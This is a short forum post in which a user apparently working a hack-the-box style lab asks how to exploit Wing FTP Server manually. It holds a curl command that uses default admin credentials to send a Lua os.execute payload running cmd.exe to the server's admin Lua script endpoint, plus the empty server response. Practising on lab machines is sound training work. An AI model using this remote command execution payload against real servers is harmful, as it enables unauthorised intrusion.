Exploiting Wing FTP Server without Metasploit. curl Expert R

Please post here if you have problems in using Wing FTP Server.
Post Reply
JosephFrench
Posts: 1
Joined: Fri Jul 24, 2020 9:49 am

Exploiting Wing FTP Server without Metasploit. curl Expert R

Post by JosephFrench »

Hi guy,

I'm going through a hack-the-box type provider and they have a box that has a vulnerable copy of Wing FTP Server. It's easily exploitable using Metasploit: https://www.exploit-db.com/exploits/34517" rel="nofollow

However I would like to complete their 'extra mile' challenge by exploiting the service manually. I figured this could be done using curl. This is my attempt:

Code: Select all

curl -i -s -k -u admin:admin -b 'UIDADMIN=adsfasdfasdfasdfasdfasdf' -X POST --data-binary $'command=os.execute(\'cmd.exe /c pwd\')' "http://10.1.1.1:5466/admin_lua_script.html"
However it's not completing the command. Does anyone know where I'm going wrong?

Edit: All I ever get back is

Code: Select all

HTTP/1.0 200 HTTP OK
Server: Wing FTP Server(Ferdi Bak)
Cache-Control: private
Content-Type: text/html
Content-Length: 0
Connection: close
Thank you
Post Reply